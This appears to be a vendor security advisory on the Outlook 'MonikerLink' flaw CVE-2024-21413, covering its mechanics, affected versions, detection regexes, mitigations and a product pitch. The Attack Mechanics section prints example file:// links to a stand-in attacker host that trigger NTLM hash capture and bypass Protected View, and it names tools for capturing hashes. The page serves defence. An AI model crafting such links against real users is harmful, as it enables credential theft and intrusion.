CVE-2024-21413: Microsoft Outlook MonikerLink RCE
Dubbed "MonikerLink," CVE-2024-21413 is a critical Microsoft Outlook vulnerability that bypasses Protected View to achieve remote code execution and NTLM credential theft — simply by previewing a malicious email. CVSS 9.8 CRITICAL. No user interaction beyond email preview required.
| Attribute | Value |
|---|---|
| CVE ID | CVE-2024-21413 |
| CVSS Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-20: Improper Input Validation |
| Published | February 13, 2024 |
| Exploitation | Public PoC — widely exploited |
What Is CVE-2024-21413?
CVE-2024-21413 exploits the way Microsoft Outlook handles hyperlinks containing the ! (exclamation mark) character as part of a file moniker URI. Normally, Outlook applies "Protected View" to documents opened from email — sandboxing Office documents to prevent code execution. This vulnerability bypasses that protection entirely.
By crafting a hyperlink in the format file://ATTACKER-SERVER/test.rtf!something, an attacker causes Outlook to open the RTF file without Protected View, while simultaneously triggering an automatic NTLM authentication attempt to the attacker's SMB server. The attacker captures the NTLMv2 hash for offline cracking or relay attacks.
🚨 Preview Pane Attack — No Click Required
This vulnerability triggers in the Outlook Preview Pane. The victim only needs to select the email in their inbox — no attachment opening, no link clicking required. In a corporate environment, a single phishing email sent to a distribution list could compromise hundreds of NTLMv2 hashes simultaneously.
Affected Products
| Product | Affected Versions |
|---|---|
| Microsoft Outlook 2016 | Before February 2024 update |
| Microsoft Outlook 2019 | Before February 2024 update |
| Microsoft Outlook LTSC 2021 | Before February 2024 update |
| Microsoft 365 Apps for Enterprise | Before February 2024 update |
Not affected: Outlook on the web (OWA), Outlook for iOS/Android, Outlook for Mac. The vulnerability is specific to Windows desktop Outlook clients.
Attack Mechanics: The MonikerLink Technique
Windows COM (Component Object Model) uses "monikers" to bind to objects by name. The file:// URI scheme in Windows can include a moniker component after the ! character, which instructs Windows to load and activate the referenced COM object.
# Normal file link — Protected View applied file://attacker.com/share/document.rtf # MonikerLink bypass — ! bypasses Protected View file://attacker.com/share/document.rtf!1337 # When Outlook processes the MonikerLink: # 1. Attempts SMB connection to attacker.com # 2. Sends NTLMv2 authentication (captures hash) # 3. Opens file without Protected View # 4. If file is malicious RTF → RCE
NTLM Hash Capture Flow
Even without a weaponized RTF file, the NTLM relay attack is impactful:
- Victim previews malicious email in Outlook
- Outlook makes automatic SMB connection to attacker-controlled server
- Windows sends NTLMv2 challenge-response (hash) to authenticate
- Attacker captures hash with Responder, Impacket, or similar tools
- Hash cracked offline (weak passwords in hours) or relayed in real-time to other services
Real-World Exploitation
Following public PoC release, CVE-2024-21413 was incorporated into commercial phishing toolkits within days. Observed campaigns included:
- Corporate credential harvesting: Bulk emails to enterprise distribution lists to capture large volumes of NTLM hashes
- Targeted initial access: Spear-phishing executives with tailored emails containing MonikerLink payloads
- Lateral movement chains: NTLM relay from captured hashes to internal services (SMB, LDAP, HTTP)
- Business email compromise: Credential harvesting enabling mailbox access for BEC fraud
Detection
Email Gateway Rules
# Regex pattern for MonikerLink in email body/attachments # Detect file:// links containing ! character \bfile:\/\/[^\s"']+![^\s"']* # Block external UNC/file links entirely (recommended) \bfile:\/\/[^\s"']+ \\\\[a-z0-9.-]+\\
Network Detection
- SMB connections from endpoint workstations to external IP addresses (should never occur)
- NTLMv2 authentication attempts to unexpected destination IPs
- DNS queries for attacker-controlled domains from mail clients
Endpoint Detection
- OUTLOOK.EXE initiating outbound TCP/445 connections
- Office process spawning child processes after email preview
- LSASS access from Office processes
Mitigation
- Apply February 2024 patches: Microsoft Security Update for Outlook addresses the Protected View bypass
- Block SMB outbound at perimeter: Firewall rules blocking TCP/445 and TCP/139 outbound prevent NTLM hash capture even if the vulnerability triggers
- Enable NTLM relay protections: Configure SMB signing and LDAP signing to prevent relay attacks
- Deploy Email Security Gateway: Block emails containing
file://and\\(UNC path) links in body and attachments - Disable NTLM where possible: Organizations using Kerberos can disable NTLM to eliminate the hash capture attack path
💡 Defense in Depth: Even if you've patched Outlook, blocking outbound SMB at the firewall is a best practice that prevents this entire class of attacks. Many organizations allow outbound SMB for legacy file sharing reasons — audit and restrict this immediately.
KENSAI Detection Capability
- Email client version inventory: KENSAI identifies Outlook versions across your organization, flagging unpatched versions vulnerable to CVE-2024-21413
- Phishing simulation: KENSAI's phishing assessment module can test employee susceptibility to MonikerLink-style lures
- Network exposure analysis: Identifies misconfigured firewalls allowing outbound SMB from workstations
- Patch compliance: Continuous monitoring for Microsoft Office patch levels against known CVE coverage
Are Your Outlook Clients Patched Against MonikerLink?
KENSAI scans your endpoint fleet for vulnerable Outlook versions and identifies network paths that would enable NTLM hash capture. Get visibility in minutes.
Assess Your Email Attack Surface →